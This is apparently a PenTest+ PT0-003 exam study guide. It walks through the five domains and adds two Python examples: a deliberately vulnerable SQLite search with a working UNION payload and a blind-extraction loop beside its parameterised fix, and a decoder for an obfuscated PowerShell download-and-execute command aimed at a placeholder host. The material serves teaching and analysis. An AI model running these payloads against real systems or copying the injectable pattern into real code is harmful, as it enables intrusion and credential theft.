The gap in the CompTIA path that PenTest+ fills

CompTIA Security+ proves you understand how defenses work. CompTIA CASP+ proves you can architect enterprise-level security programmes. But neither credential proves you can plan a penetration test, execute an attack chain, and deliver findings a remediation team can actually use. That gap — between knowing security theory and demonstrating offensive capability — is exactly where PenTest+ sits.

The late-2024 PT0-003 update reflects how the attack surface has shifted. Its predecessor, PT0-002, was written before generative AI tools became standard equipment for attackers and defenders alike, and its cloud and code analysis objectives predate the current wave of cloud identity abuse. PT0-003 brings AI into the objectives, keeps the cloud attack and code analysis content PT0-002 introduced, and gives post-exploitation and lateral movement a domain of their own. The exam costs $404 USD, runs at Pearson VUE testing centres and online, and carries DoD 8140 IAT/IAM Level II and III approval, making it relevant for both commercial red-team roles and US government and defense contractor positions.

The PT0-003 mindset shift

PenTest+ is not a memorisation exam. The performance-based questions present a scenario, such as a network diagram, Nmap output or a web application response, and ask what to do next. Studying attack tools in isolation is not enough. You need to know the attack narrative: reconnaissance leads to scanning, scanning surfaces vulnerabilities, exploitation gains a foothold, post-exploitation expands access. Walk through complete engagement chains in lab environments, not just individual tool exercises.

The five exam domains

CompTIA publishes the full exam objectives at comptia.org. The groupings below follow the five PT0-002 domain names and weightings, which most study material still uses. The PT0-003 objectives reorganise the same material as Engagement Management (13%), Reconnaissance and Enumeration (21%), Vulnerability Discovery and Analysis (17%), Attacks and Exploits (35%) and Post-exploitation and Lateral Movement (14%), with reporting folded into engagement management and tool and code analysis spread across the technical domains. Check the published objectives for the exam version you are sitting.

Domain 1 — Planning and Scoping (14%)

Every engagement begins before the first port scan. Know the core scoping documents: rules of engagement (RoE), statement of work (SoW), and authorisation letters. Understand the difference between black-box (no prior knowledge), grey-box (partial knowledge, for example the access of a credentialed internal user), and white-box (full architecture and source access) engagements; the exam gives you a client scenario and asks which testing type is appropriate. Cover compliance considerations: PCI DSS and HIPAA environments impose requirements on testing windows, scope definitions and handling of the data you touch. Know what is explicitly out of scope and the legal consequences of exceeding it: unauthorised access is an offence under the Computer Fraud and Abuse Act (CFAA) in the US and under equivalent laws elsewhere, and a signed authorisation letter is your only defence.

Domain 2 — Information Gathering and Vulnerability Scanning (22%)

The reconnaissance domain, passive and active. OSINT techniques: WHOIS lookups, DNS enumeration (dig, nslookup, zone transfer attempts), Google dorking with site: and filetype: operators, Shodan for internet-exposed services, and LinkedIn for organisational structure mapping. Active scanning with Nmap: -sS for SYN scans, -sV for service version detection, -O for OS fingerprinting, -A for aggressive scanning (version detection, OS detection, default scripts and traceroute together), and -p- for all 65,535 TCP ports rather than the default top 1,000. Vulnerability scanning with Nessus and OpenVAS; Nikto and OWASP ZAP for web application targets. Know the difference between authenticated and unauthenticated scans: an authenticated scan reads installed packages and configuration, so it finds more and produces fewer false positives, while an unauthenticated scan shows only what an outside attacker can see. CVSS v3.1 scoring: understand the Base Score components (Attack Vector, Attack Complexity, Privileges Required, User Interaction, Scope, Confidentiality, Integrity, Availability) and how they map to risk prioritisation decisions.

Domain 3 — Attacks and Exploits (30%)

The largest and most technically demanding domain. Network attacks: ARP spoofing and VLAN hopping for lateral movement, and on-path (man-in-the-middle) interception; on Windows networks Responder poisons LLMNR and NBT-NS name resolution to capture NetNTLM challenge-responses, and Wireshark is the tool for reading the traffic you capture. Web application attacks: SQL injection (error-based, UNION-based, boolean-based blind, and time-based blind), cross-site scripting (reflected, stored, and DOM-based), CSRF token bypass, and directory traversal. Password attacks: Hydra or Medusa for online brute force, Hashcat for offline GPU cracking, and pass-the-hash against Windows NTLM authentication. Social engineering: phishing campaigns, vishing, and pretexting; PT0-003 brings AI into the objectives, reflecting the real-world use of LLMs to write targeted spear-phishing content. Metasploit: msfconsole workflow, use / set / run, payload generation with msfvenom, and Meterpreter post-exploitation commands. Cloud-specific attacks: AWS IAM privilege escalation via misconfigured role trust policies, S3 bucket enumeration for exposed data, and SSRF against the EC2 instance metadata service (http://169.254.169.254/) for credential harvesting. Know the caveat for the last one: IMDSv2 requires a session token obtained with a PUT request and a custom header, so an SSRF that can only issue a plain GET succeeds only where IMDSv1 is still enabled.
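The SQL injection variants above, worked as an added example that is not from the original page: a constructed in-memory SQLite shop database with a deliberately vulnerable search function beside its parameterised fix, a UNION-based payload that pulls a credential out of a different table, and a boolean-based blind extraction loop that recovers the same value one character at a time when the application reveals nothing but "rows or no rows". The table names, the admin row and its hash (MD5 of "password") are all constructed for this demonstration.

```python
import sqlite3


def build_db():
    """Constructed in-memory database standing in for the target application's backend."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO products (name, price) VALUES ('widget', 9.99), ('gadget', 19.99);
        INSERT INTO users (username, password_hash)
            VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def search_vulnerable(conn, term):
    """DELIBERATELY VULNERABLE: the user-supplied term is spliced into the SQL text."""
    sql = f"SELECT name, price FROM products WHERE name LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """Hardened version: the driver binds the value; the SQL text never changes."""
    sql = "SELECT name, price FROM products WHERE name LIKE ?"
    return conn.execute(sql, (f"%{term}%",)).fetchall()


# Closes the string, appends a second SELECT with matching column count,
# and comments out the trailing %' left over from the original query.
UNION_PAYLOAD = "' UNION SELECT username, password_hash FROM users--"

ADMIN_HASH_SUBQUERY = "SELECT password_hash FROM users WHERE username = 'admin'"


def is_injectable(conn, search):
    """Boolean differential test: a true and a false tautology must behave differently."""
    true_rows = search(conn, "' AND (1=1)--")
    false_rows = search(conn, "' AND (1=2)--")
    return bool(true_rows) and not false_rows


def blind_extract(conn, search, subquery, max_len=64):
    """Boolean-based blind extraction through a search that only reveals whether rows
    came back. Probes the length, then binary-searches each character's code point
    (about 7 queries per character). Returns (value, number_of_queries)."""
    queries = 0

    def oracle(cond):
        nonlocal queries
        queries += 1
        # Becomes: ... WHERE name LIKE '%' AND (<cond>)--%'
        return len(search(conn, f"' AND ({cond})--")) > 0

    length = next((n for n in range(1, max_len + 1)
                   if oracle(f"length(({subquery})) = {n}")), None)
    if length is None:
        raise ValueError("could not determine length; injection point not live?")
    chars = []
    for i in range(1, length + 1):
        lo, hi = 32, 126  # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({subquery}), {i}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars), queries


if __name__ == "__main__":
    db = build_db()
    print("UNION leak:", search_vulnerable(db, UNION_PAYLOAD))
    print("same payload, safe version:", search_safe(db, UNION_PAYLOAD))
    print("vulnerable injectable?", is_injectable(db, search_vulnerable))
    print("safe injectable?", is_injectable(db, search_safe))
    print("blind extraction:", blind_extract(db, search_vulnerable, ADMIN_HASH_SUBQUERY))
```

The blind loop is the part worth studying for the exam: it is the same technique sqlmap automates, and the query count it returns is why time-based blind injection on a slow target can take hours. The fix is not input filtering but the one-line change in search_safe: the value travels as a bound parameter, so the database never parses it as SQL.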

Domain 4 — Reporting and Communication (18%)

A pentester who cannot communicate findings is a liability. Know the components of a professional penetration test report: the executive summary (business-language risk narrative for non-technical stakeholders), the technical findings section (per-vulnerability detail for engineers), and the remediation roadmap (prioritised fix list with effort estimates). Each finding should follow a consistent structure: description, affected asset, CVSS score, evidence (screenshots and log excerpts), proof-of-concept reproduction steps, and specific remediation guidance. Understand risk presentation: severity ratings must be contextualised against the client’s environment — a high-CVSS vulnerability on an air-gapped test server carries different business risk than the same CVE on an internet-facing payment processor. Post-engagement activities: evidence handling, data destruction requirements, and the difference between a remediation verification retest and a full follow-on engagement.

Domain 5 — Tools and Code Analysis (16%)

Tools and code analysis has been examined since PT0-002 and carries over into PT0-003, where scripting questions appear across the technical domains. The exam shows Python, PowerShell, or Bash snippets and asks what they do, what they output, or where they fail. Know Python for scripting reconnaissance automation and post-exploitation tasks: the requests library for HTTP interactions, socket for raw network operations, and subprocess for shell commands. Know common offensive Bash patterns: reverse shell one-liners, file transfer tricks via curl and wget, and cron persistence. Recognise obfuscation techniques: Base64-encoded payloads (PowerShell's -EncodedCommand takes Base64 of UTF-16LE text, not UTF-8, which trips up naive decoders), character substitution and string concatenation in PowerShell commands, and environment variable abuse. Core tooling: Burp Suite for intercepting and modifying web application traffic, Wireshark for protocol-level packet analysis, Hashcat for password cracking, and CrackMapExec (CME, now continued as NetExec) for Active Directory enumeration and lateral movement.
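An added example, not from the original page, of the code-analysis task this domain describes: unwrapping a PowerShell command line that uses -EncodedCommand (Base64 of UTF-16LE) with a gzip-compressed FromBase64String stage nested inside it, then pulling out indicators and URLs for the report. The sample command line, the stage-2 URL (a hypothetical example.invalid host) and the indicator list are constructed for this demonstration; the script builds the encoded blob itself so it runs offline and the expected answer is known.

```python
import base64
import gzip
import re

# Constructed sample: the staged one-liner is assembled here so the example runs
# offline and the decoded result is known. Nothing below was captured from a real host.
STAGE2_URL = "http://example.invalid/stage2.ps1"  # hypothetical
INNER_SCRIPT = f"IEX (New-Object Net.WebClient).DownloadString('{STAGE2_URL}')"
_inner_b64 = base64.b64encode(gzip.compress(INNER_SCRIPT.encode())).decode()
OUTER_SCRIPT = (
    f"$d=[Convert]::FromBase64String('{_inner_b64}');"
    "IEX ([IO.StreamReader]::new([IO.Compression.GzipStream]::new("
    "[IO.MemoryStream]::new($d),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()"
)
ENCODED = base64.b64encode(OUTER_SCRIPT.encode("utf-16-le")).decode()
SAMPLE_CMDLINE = f"powershell.exe -NoP -W Hidden -NonI -Exec Bypass -Enc {ENCODED}"


def encoded_command_arg(cmdline):
    """Return the argument following -EncodedCommand, or None. powershell.exe accepts
    any unambiguous case-insensitive prefix (-e, -ec, -enc, ...), which is what
    attackers use, so match on prefix rather than the full switch name."""
    tokens = cmdline.split()  # the constructed sample has no quoted arguments
    for i in range(len(tokens) - 1):
        flag = tokens[i]
        if len(flag) > 1 and flag[0] in "-/" and "encodedcommand".startswith(flag[1:].lower()):
            return tokens[i + 1]
    return None


def decode_blob(b64):
    """Decode one Base64 layer: gunzip if it carries the gzip magic, then decode as
    UTF-16LE (what -EncodedCommand requires) or UTF-8 (the usual inner encoding)."""
    raw = base64.b64decode(b64)
    if raw[:2] == b"\x1f\x8b":
        raw = gzip.decompress(raw)
    if len(raw) >= 2 and raw[1:2] == b"\x00":  # ASCII text in UTF-16LE has NUL odd bytes
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


_INNER_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def unwrap(cmdline, max_depth=5):
    """Peel the -EncodedCommand layer and any nested FromBase64String layers.
    Returns the decoded script of each layer, outermost first."""
    b64 = encoded_command_arg(cmdline)
    if b64 is None:
        return []
    layers = [base64.b64decode(b64).decode("utf-16-le")]
    for _ in range(max_depth):  # bounded so a self-referencing blob cannot loop forever
        m = _INNER_B64.search(layers[-1])
        if not m:
            break
        layers.append(decode_blob(m.group(1)))
    return layers


# Assumed indicator list for the demo; a real triage list would be much longer.
INDICATORS = ("IEX", "Invoke-Expression", "DownloadString", "FromBase64String",
              "GzipStream", "-W Hidden", "-Exec Bypass", "-NoP")


def indicators(cmdline):
    """Case-insensitive indicator hits across the command line and every decoded layer."""
    haystack = "\n".join([cmdline] + unwrap(cmdline)).lower()
    return [ind for ind in INDICATORS if ind.lower() in haystack]


def urls(cmdline):
    """URLs that only become visible after decoding."""
    return re.findall(r"https?://[^\s'\")]+", "\n".join(unwrap(cmdline)))


if __name__ == "__main__":
    for depth, layer in enumerate(unwrap(SAMPLE_CMDLINE)):
        print(f"layer {depth}: {layer[:90]}...")
    print("indicators:", indicators(SAMPLE_CMDLINE))
    print("urls:", urls(SAMPLE_CMDLINE))
```

Two details matter when you meet this on an exam screen or in a log: the outer layer must be decoded as UTF-16LE (decoding it as UTF-8 produces text with a NUL after every character), and the inner blob is often compressed, so check the first two bytes for the gzip magic before assuming it is text.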

The mistake most Security+ holders make when beginning PenTest+ preparation: they study attack tools independently rather than practising complete engagement chains. The exam scenarios describe an in-progress penetration test and ask what to do next given the evidence on screen. Knowing how to run Nmap is not enough: you need to know how the Nmap output informs your Metasploit module selection, which informs your Meterpreter privilege escalation path, which informs the finding you write in your report. Complete at least one full engagement walkthrough on HackTheBox or TryHackMe per week during prep. The narrative structure that builds is exactly what the performance-based questions test.

Where PT0-003 leads on the cert map

PenTest+ sits at the practitioner tier of CompTIA's cybersecurity pathway, above Security+ and below CASP+. Candidates who complete PT0-003 are well-positioned for CompTIA CASP+ CAS-004 (CompTIA's expert-level security architecture credential, rebranded SecurityX in late 2024) and for vendor-specific offensive certifications: the EC-Council CEH (Certified Ethical Hacker) covers broadly similar territory from a knowledge-testing perspective, while the OffSec OSCP (OffSec Certified Professional) is the industry-recognised practical exam, a 24-hour hands-on exploitation exam against a live lab network followed by a written report, and the most rigorous real-world validation in offensive security.

PenTest+ is also DoD 8140 approved at IAT Level II and IAM Level III, qualifying holders for penetration tester, vulnerability analyst, and information assurance roles in US government and defense contractor environments. For professionals working toward a red team or threat intelligence career, PT0-003 stacks cleanly with CySA+ (blue team perspective) or eJPT (practical entry-level) as part of a well-rounded security credential portfolio.

Why it matters for cert candidates

The cybersecurity workforce gap is sharpest in offensive security: penetration testers and red team operators remain among the highest-demand, highest-compensation roles in the industry. CompTIA PenTest+ PT0-003 is the structured, vendor-neutral pathway from defensive security knowledge to offensive capability: DoD approved, updated for cloud and AI-era threats, and covering the full engagement lifecycle from scoping through reporting. Typical preparation is 4–6 weeks for candidates who already hold Security+ and have hands-on lab experience. Pair the official CompTIA CertMaster Learn materials with at least one practical lab platform (HackTheBox Academy or TryHackMe) and practise writing professional findings reports; reporting is consistently underestimated in preparation, and every exam scenario ends in a finding someone has to write up.

Ready to reinforce the security fundamentals that underpin every PenTest+ domain? Test yourself on Security+ SY0-701 concepts — the knowledge layer every penetration tester builds on.